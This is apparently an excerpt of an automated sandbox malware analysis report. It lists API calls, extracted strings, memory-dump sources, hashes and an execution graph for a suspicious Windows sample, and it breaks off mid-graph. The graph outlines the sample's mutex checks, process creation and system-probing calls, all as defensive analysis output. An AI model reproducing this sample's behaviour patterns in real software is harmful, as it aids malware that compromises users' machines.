                                                                  • Opcode Fuzzy Hash: 400b9e1c09f4c8b4246377677c855733b0a7004988ecaecd724ee2ff353f4308
                                                                  • Instruction Fuzzy Hash: 7F5128315003028BD7108B28DE4C72A7BE1EB15324F25467ED656BF3E1DBB88806CB59
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,00606DFB,?,?,00000000), ref: 00606D7C
                                                                    • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00606DFB,?,?,00000000), ref: 00606DAC
                                                                  • EnumCalendarInfoA.KERNEL32(Function_00006CB0,00000000,00000000,00000004), ref: 00606DB7
                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00606DFB,?,?,00000000), ref: 00606DD5
                                                                  • EnumCalendarInfoA.KERNEL32(Function_00006CEC,00000000,00000000,00000003), ref: 00606DE0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                  • String ID:
                                                                  • API String ID: 4102113445-0
                                                                  • Opcode ID: 64468f9e38e86cbae6d5be39c18cfd5a5062b6d04b52a85de6321f918ccf37d8
                                                                  • Instruction ID: 351a49cc6eeb8d263ff2a59df9ed8983b84ceb925ca044530df0050181d320a2
                                                                  • Opcode Fuzzy Hash: 64468f9e38e86cbae6d5be39c18cfd5a5062b6d04b52a85de6321f918ccf37d8
                                                                  • Instruction Fuzzy Hash: 940126757C42486BE319FBB0CC13B5B765FEF85720F510564F600E66C2EA659E1082A9
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,00401A42,00000000,?,?,?,004018C0,?,?,00000000,00000000), ref: 00402264
                                                                  • TlsGetValue.KERNEL32(?,00000000,00401A42,00000000,?,?,?,004018C0,?,?,00000000,00000000), ref: 00402272
                                                                  • SetLastError.KERNEL32(00000000,?,00000000,00401A42,00000000,?,?,?,004018C0,?,?,00000000,00000000), ref: 004022BE
                                                                    • Part of subcall function 004030C5: HeapAlloc.KERNEL32(00000008,?,?,?,?,0040221A,00000001,00000074,?,00401836), ref: 0040311A
                                                                  • TlsSetValue.KERNEL32(00000000,?,00000000,00401A42,00000000,?,?,?,004018C0,?,?,00000000,00000000), ref: 00402296
                                                                  • GetCurrentThreadId.KERNEL32(?,00000000,00401A42,00000000,?,?,?,004018C0,?,?,00000000,00000000), ref: 004022A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                  • String ID:
                                                                  • API String ID: 2020098873-0
                                                                  • Opcode ID: 335a875935f7b19f5e8a0b5442704e984695624e2c3f9a47eb943db27249e189
                                                                  • Instruction ID: f9de0d5041fc25c08b20143062fd2b82a10856d808b46f2208d999d265b65f83
                                                                  • Opcode Fuzzy Hash: 335a875935f7b19f5e8a0b5442704e984695624e2c3f9a47eb943db27249e189
                                                                  • Instruction Fuzzy Hash: 0BF0BB32601A115BD7312F71BF0DA5F3A54EF01B71715027EF945BA2E0DB7988014AE8
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,00606FDE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00606E43
                                                                    • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: eeee$ggg$yyyy
                                                                  • API String ID: 4232894706-1253427255
                                                                  • Opcode ID: b291cb8597261f6514058d5d14fcbabcc4e1ef7db54b89a8c03662ca38e12f5f
                                                                  • Instruction ID: 549bb3956218e062135398211ae85f01a1fb8ae2f528c7acbdc3c2fb8c59784f
                                                                  • Opcode Fuzzy Hash: b291cb8597261f6514058d5d14fcbabcc4e1ef7db54b89a8c03662ca38e12f5f
                                                                  • Instruction Fuzzy Hash: 254103357C82164BD71DAB78C8816BFF7ABDB84300B604569F442D33C6DA70EE16C669
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000000,00606C9F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00606BA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LocaleThread
                                                                  • String ID: DR`$|R`$Q`
                                                                  • API String ID: 635194068-1853681101
                                                                  • Opcode ID: 06f649347e903f645061d77f2fb1060dac145866f74880fa77775b5ebe0026ea
                                                                  • Instruction ID: 239d570031dca18a3b836607bbb55e997dcfd0203a85c96b2fac2a33e89f6fe5
                                                                  • Opcode Fuzzy Hash: 06f649347e903f645061d77f2fb1060dac145866f74880fa77775b5ebe0026ea
                                                                  • Instruction Fuzzy Hash: B131B471F801085BD708DA95C891BAF77AFDB88310F11447AFA09D73C1DA35ED1187A9
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00608E0A
                                                                    • Part of subcall function 00608D40: lstrcmpA.KERNEL32(?,?), ref: 00608D95
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoadlstrcmp
                                                                  • String ID: Hfqmfo01$LvwsvwGfavdPwqjmdB$that made me looool
                                                                  • API String ID: 2493137890-1512227557
                                                                  • Opcode ID: ac9e2763bc583bae6a6ae1e0cdd70218bde24cb25572d77f1616a3f6bdbf989c
                                                                  • Instruction ID: 91cfcea0a7c87a67f9c2548e482a2e6c48ff6f34df040ee4925186b5e68baebf
                                                                  • Opcode Fuzzy Hash: ac9e2763bc583bae6a6ae1e0cdd70218bde24cb25572d77f1616a3f6bdbf989c
                                                                  • Instruction Fuzzy Hash: BEF081307807146FE348EBA4CC12B5F7AAEDB85740F510478F580977C2DE749E008668
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00608799,00000000,006087AC), ref: 0060828E
                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,00608799,00000000,006087AC), ref: 0060829F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                  • API String ID: 1646373207-3712701948
                                                                  • Opcode ID: 3d83e3763f9cb26a47f97c377c5ba6a369e8466b53bdeef0079a243f54f614f4
                                                                  • Instruction ID: 5e6b4c9483f2f7c51195c5a922daefa23dd3e15a114a57c8b2c2df2eadd9ead3
                                                                  • Opcode Fuzzy Hash: 3d83e3763f9cb26a47f97c377c5ba6a369e8466b53bdeef0079a243f54f614f4
                                                                  • Instruction Fuzzy Hash: 41D09EB06C1F469EF718EBE15C85613359F9740349F40A429B143472D1EEA589445FE5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Cv1b65s4fhs5g$LEK$LEN$LET$LeN2
                                                                  • API String ID: 0-540611677
                                                                  • Opcode ID: ebd5129da31cb8bec77683622b2556c110d4d57b298ed4dd0b3c90598997d42e
                                                                  • Instruction ID: 303b0df73370c22c81846fce0fc5bee04f2d4bd8b943fa37c21e1f5f327a566b
                                                                  • Opcode Fuzzy Hash: ebd5129da31cb8bec77683622b2556c110d4d57b298ed4dd0b3c90598997d42e
                                                                  • Instruction Fuzzy Hash: A3517430A841495FDF89EBA4C8429DFB7B7EF55300F5040A9E481A73D2DE749E06CB59
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: Cv1b65s4fhs5g$LEK$LEN$LET$LeN2
                                                                  • API String ID: 1029625771-540611677
                                                                  • Opcode ID: dc3abd6f085aa029bf8dc6caa9084fddafc0af94d937e161695d8a450c00fc25
                                                                  • Instruction ID: fbcd3e01223230a3ddce9288ca9acb4f485afac74d0806ade84b1f33029c4d3b
                                                                  • Opcode Fuzzy Hash: dc3abd6f085aa029bf8dc6caa9084fddafc0af94d937e161695d8a450c00fc25
                                                                  • Instruction Fuzzy Hash: 6A412130A805095FDF88FB94C882ADFB7B7EF44300F504569E481A73D2DE74AE468B59
                                                                  APIs
                                                                  • GetStringTypeExA.KERNEL32(?,00000002,?,00000080,?), ref: 00607E66
                                                                  • GetThreadLocale.KERNEL32 ref: 00607D96
                                                                    • Part of subcall function 00607CF4: GetCPInfo.KERNEL32(00000000,?), ref: 00607D0D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocaleStringThreadType
                                                                  • String ID:
                                                                  • API String ID: 1505017576-0
                                                                  • Opcode ID: c20fea7ece837fd4a4d4c232880b2c9fb4836bd1c3298877a86fcb63a872c9ac
                                                                  • Instruction ID: 031fbc90ea44a9d57a695ee475c96b9f8855e0aa644ccf8bf3c3245cd95ddff9
                                                                  • Opcode Fuzzy Hash: c20fea7ece837fd4a4d4c232880b2c9fb4836bd1c3298877a86fcb63a872c9ac
                                                                  • Instruction Fuzzy Hash: 84312621EC93858BD764DB64EC017A73FA7EB91305F04A0D9E9448B3D2EB346C49C766
                                                                  APIs
                                                                  • GetVersion.KERNEL32 ref: 004017EC
                                                                    • Part of subcall function 004022C9: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401824,00000001), ref: 004022DA
                                                                    • Part of subcall function 004022C9: HeapDestroy.KERNEL32 ref: 004022F8
                                                                  • GetCommandLineA.KERNEL32 ref: 0040184C
                                                                  • GetStartupInfoA.KERNEL32 ref: 00401877
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040189A
                                                                    • Part of subcall function 004018F3: ExitProcess.KERNEL32 ref: 00401910
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                  • String ID:
                                                                  • API String ID: 2057626494-0
                                                                  • Opcode ID: 580e609f3b58203afaf02fb415f8282007d0353eaa0aedd914cb555909b1db8c
                                                                  • Instruction ID: 7f32cd8fe34967029b0e80cb92399a2b70a2c6a079cbf2585e16a7e0bb248895
                                                                  • Opcode Fuzzy Hash: 580e609f3b58203afaf02fb415f8282007d0353eaa0aedd914cb555909b1db8c
                                                                  • Instruction Fuzzy Hash: 3E2160B19407059BDB08BBA5DD4AA6E7BA8FF04714F10403FF905BA2E1DB788940CB58
APIs
• GetCPInfo.KERNEL32(?,00000000), ref: 004029AC
Strings
Memory Dump Source
• Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_25F.jbxd
Similarity
• API ID: Info
• String ID: $
• API String ID: 1807457897-3032137957
• Opcode ID: eee52de4ef1d4b68b42ec2e047e9f4f22a41eb0dfe49c41ee4b0386842691e7c
• Instruction ID: 926cd45f255bbb82106f54f5591ecb558f37e935955913c86844fdd4412d6bab
• Opcode Fuzzy Hash: eee52de4ef1d4b68b42ec2e047e9f4f22a41eb0dfe49c41ee4b0386842691e7c
• Instruction Fuzzy Hash: 88415A312042585AFB219B14DF4DBFB3FA9EB01704F1500F6D586F61D2C6B94A54CBAA
APIs
• VirtualQuery.KERNEL32(?,?,0000001C,00000000,0060787F), ref: 00607729
• GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0060787F), ref: 0060774B
  • Part of subcall function 00604B70: LoadStringA.USER32 ref: 00604BA2
Strings
Memory Dump Source
• Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_600000_25F.jbxd
Similarity
• API ID: FileLoadModuleNameQueryStringVirtual
• String ID: |Q`
• API String ID: 902310565-1287144811
• Opcode ID: f04f175d259c25fdcbc041710ef7f9a517576aab3b3a3207c45b177d1155a1ec
• Instruction ID: 29300fce4ad5f21c6a0c8294c9238be0950d320ce33057e9c1de983e8ff0d5f7
• Opcode Fuzzy Hash: f04f175d259c25fdcbc041710ef7f9a517576aab3b3a3207c45b177d1155a1ec
• Instruction Fuzzy Hash: CE51D270A44658DFDB65DB68CD85BCAB7FAAB48300F4041E9E508AB391E770AE84CF51
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_600000_25F.jbxd
Similarity
• API ID: CreateWindow
• String ID: first Window app$oloooool
• API String ID: 716092398-2688301056
• Opcode ID: bf0f031763fedf2387eb07865909b2dcda5b1958d1a37e0667197b562cbda9e5
• Instruction ID: 6bf7e3dfdf983de485033f2134917db6cee18bc32def7ed793967fc69823b713
• Opcode Fuzzy Hash: bf0f031763fedf2387eb07865909b2dcda5b1958d1a37e0667197b562cbda9e5
• Instruction Fuzzy Hash: C2F0AFB2704259BFDB94DE9DDC85E9B77ECEB8C2A0B004129BA0CD7241D630ED108BB4
APIs
• InitializeCriticalSection.KERNEL32(0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019E7
• EnterCriticalSection.KERNEL32(0060B5C4,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019FA
• LocalAlloc.KERNEL32(00000000,00000FF8,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 00601A24
• LeaveCriticalSection.KERNEL32(0060B5C4,00601A9F,00000000,00601A98,?,?,?,006023F6), ref: 00601A92
Memory Dump Source
• Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_600000_25F.jbxd
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID:
• API String ID: 730355536-0
• Opcode ID: d83a478d0fbd83e8168573bd93e1b4583d2a59f1f9abd21cdc0df2ac30b95189
• Instruction ID: 74df882c1a01e5d4aec3e25528a86efcb18e16bd6ea950092898227c461be41d
• Opcode Fuzzy Hash: d83a478d0fbd83e8168573bd93e1b4583d2a59f1f9abd21cdc0df2ac30b95189
• Instruction Fuzzy Hash: 671160B0AC4241AFD75DEF99CC15B5BBBE3DB4A300F14E4A9A1009B3D1C7754D418B58
APIs
• InitializeCriticalSection.KERNEL32(?,00402201,?,00401836), ref: 00402671
• InitializeCriticalSection.KERNEL32(?,00402201,?,00401836), ref: 00402679
• InitializeCriticalSection.KERNEL32(?,00402201,?,00401836), ref: 00402681
• InitializeCriticalSection.KERNEL32(?,00402201,?,00401836), ref: 00402689
Memory Dump Source
• Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_25F.jbxd
Similarity
• API ID: CriticalInitializeSection
• String ID:
• API String ID: 32694325-0
• Opcode ID: cf65fcc1aeab1ef7e16435afcb5f7beaf118cbbb08b94427fa8083d0bb468be8
• Instruction ID: 48065476d1b059bde1b2936bcb0e38e24f7665c16bd3e9ed4f641355b81c547b
• Opcode Fuzzy Hash: cf65fcc1aeab1ef7e16435afcb5f7beaf118cbbb08b94427fa8083d0bb468be8
• Instruction Fuzzy Hash: 16C0E931A070249ACB513B75FE0484A3E25EB0426031640BAA5096203486331830DFD8

Execution Graph

Execution Coverage: 4.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 9.8%
Total number of Nodes: 737
Total number of Limit Nodes: 24
                                                                  execution_graph 13063 405f09 13064 405f10 13063->13064 13065 405fe4 13064->13065 13069 405ffc 13064->13069 13067 4056e0 22 API calls 13065->13067 13066 406033 13070 405fed 13067->13070 13068 406010 13072 405820 39 API calls 13068->13072 13069->13066 13069->13068 13071 4056e0 22 API calls 13069->13071 13071->13068 13072->13068 10242 410910 memset 10277 40a5d0 10242->10277 10244 41093d GetProcessHeap memset GetModuleFileNameA 10245 41098c 10244->10245 10246 4109cf GetTickCount 10244->10246 10279 40f2b0 10245->10279 10248 4109db 10246->10248 10251 4109f3 Sleep OpenMutexA 10248->10251 10249 4109a7 10249->10246 10250 4109ae ShellExecuteA 10249->10250 10250->10246 10252 410a21 GetLastError 10251->10252 10253 410a38 lstrlenA 10251->10253 10252->10253 10254 410a2e GetLastError ExitProcess 10252->10254 10288 401e60 10253->10288 10258 410a71 10259 410a78 ExitProcess 10258->10259 10260 410a7f 10258->10260 10318 4073e0 memset memset 10260->10318 10262 410a8e 10263 410a96 ExitProcess 10262->10263 10264 410a9e 10262->10264 10330 407330 memset 10264->10330 10268 410ab4 10347 406850 SHGetSpecialFolderPathW 10268->10347 10270 410abe GetModuleFileNameW wsprintfW WideCharToMultiByte lstrcpynW WideCharToMultiByte 10271 410b4a 10270->10271 10272 410b5f 10270->10272 10348 40a990 10271->10348 10355 405ce0 10272->10355 10275 410b4f Sleep 10275->10272 10276 410b6b ExitProcess 10278 40a5e5 10277->10278 10278->10244 10369 403810 GetProcessHeap RtlAllocateHeap 10279->10369 10281 40f2ca 10282 40f2d3 10281->10282 10283 40f2db sprintf CreateFileA 10281->10283 10282->10249 10284 40f307 memset DeviceIoControl CloseHandle 10283->10284 10285 40f365 10283->10285 10284->10285 10370 4037f0 GetProcessHeap HeapFree 10285->10370 10287 40f37b 10287->10249 10289 401e6f _snprintf 10288->10289 10290 404d00 10289->10290 10292 404d0e 10290->10292 10291 404d16 10291->10258 10292->10291 10371 403a20 10292->10371 10294 404d33 10295 404d37 
10294->10295 10296 404d3d GetVersionExA 10294->10296 10295->10258 10296->10295 10297 404d56 10296->10297 10376 403f90 10297->10376 10299 404d5c 10386 403390 10299->10386 10301 404d7e 10395 404ae0 10301->10395 10303 404d9b 10417 403ac0 10303->10417 10305 404da6 strncpy 10421 4035d0 10305->10421 10307 404dd0 NtQueryInformationProcess 10308 404e53 10307->10308 10309 404ddc 10307->10309 10422 403890 10308->10422 10443 403440 10309->10443 10312 404e67 10430 403750 10312->10430 10314 404dee 10314->10308 10315 404e6d 10434 404c20 10315->10434 10317 404e7e 10317->10258 10319 407430 lstrlenA 10318->10319 10320 407453 _vsnprintf lstrlenA 10318->10320 10319->10320 10321 407437 _snprintf 10319->10321 10513 404900 10320->10513 10321->10320 10323 407495 10324 4074a8 _memicmp 10323->10324 10325 40749c 10323->10325 10326 4074bc _vsnprintf 10324->10326 10327 4074ee 10324->10327 10325->10262 10528 40a310 10326->10528 10327->10262 10329 4074eb 10329->10327 10331 407368 lstrlenA 10330->10331 10332 40738b _vsnprintf lstrlenA 10330->10332 10331->10332 10333 40736f _snprintf 10331->10333 10539 4049f0 10332->10539 10333->10332 10335 4073cc 10336 40b300 GetProcessHeap HeapAlloc memset memset 10335->10336 10337 40b360 10336->10337 10338 40b37b GetWindowsDirectoryW 10336->10338 10337->10268 10338->10337 10339 40b391 lstrcpynW GetVolumeInformationW 10338->10339 10340 40b3c5 10339->10340 10341 40b3cc lstrlenA 10339->10341 10340->10341 10342 40b3f6 10341->10342 10343 40b3de 10341->10343 10345 40b467 10342->10345 10346 40b45b lstrcatW 10342->10346 10344 40b3e0 lstrlenA 10343->10344 10344->10342 10344->10344 10345->10268 10346->10345 10347->10270 10349 40a9a5 10348->10349 10565 4068b0 SHGetSpecialFolderPathW 10349->10565 10351 40a9cd 10352 40a9d1 10351->10352 10353 40a9d6 CreateProcessW 10351->10353 10352->10275 10354 40a9f7 10353->10354 10354->10275 10356 406033 10355->10356 10357 405cf3 10355->10357 10356->10276 10357->10356 10358 405d55 10357->10358 10359 405f86 10357->10359 10360 403440 10 
API calls 10358->10360 10361 405fe4 10359->10361 10362 405ffc 10359->10362 10368 405d60 10360->10368 10363 4056e0 22 API calls 10361->10363 10362->10356 10364 406010 10362->10364 10568 4056e0 10362->10568 10365 405fed 10363->10365 10364->10276 10582 405820 memset 10364->10582 10365->10276 10368->10359 10369->10281 10370->10287 10373 403a25 10371->10373 10372 403a2d 10372->10294 10373->10372 10462 4035b0 GetPEB 10373->10462 10375 403a44 10375->10294 10377 403fa6 10376->10377 10378 403f9f 10376->10378 10380 404018 10377->10380 10381 403890 3 API calls 10377->10381 10379 403890 3 API calls 10378->10379 10379->10377 10380->10299 10382 403fd1 10381->10382 10383 403750 2 API calls 10382->10383 10384 403fd7 10383->10384 10384->10380 10385 404003 GetNativeSystemInfo 10384->10385 10385->10380 10387 4033a0 10386->10387 10388 40339b 10386->10388 10463 4030c0 10387->10463 10388->10301 10391 4030c0 RtlInitializeCriticalSection 10393 4033c3 10391->10393 10392 40342e 10392->10301 10393->10392 10467 4031d0 10393->10467 10396 404af2 10395->10396 10397 404b54 10395->10397 10396->10397 10398 404b0d strncpy sprintf CreateMutexA 10396->10398 10397->10303 10399 404b4b 10398->10399 10400 404b5c _snprintf OpenFileMappingA 10398->10400 10482 404880 10399->10482 10402 404b96 CloseHandle 10400->10402 10403 404b9d 10400->10403 10402->10403 10405 404bad 10403->10405 10474 404560 10403->10474 10404 404b51 10404->10397 10409 404bd1 10405->10409 10491 404470 10405->10491 10408 404bbc 10410 404bc8 10408->10410 10411 404bda 10408->10411 10409->10303 10412 404880 3 API calls 10410->10412 10413 404c08 10411->10413 10414 404bde WaitForSingleObject 10411->10414 10415 404bce 10412->10415 10413->10303 10414->10413 10416 404bed ReleaseMutex 10414->10416 10415->10409 10416->10413 10418 403b10 10417->10418 10419 403acc 10417->10419 10418->10305 10419->10418 10420 403ae0 _snprintf 10419->10420 10420->10305 10421->10307 10423 4038a0 10422->10423 10424 4038ae 10422->10424 10497 4035b0 GetPEB 10423->10497 10427 
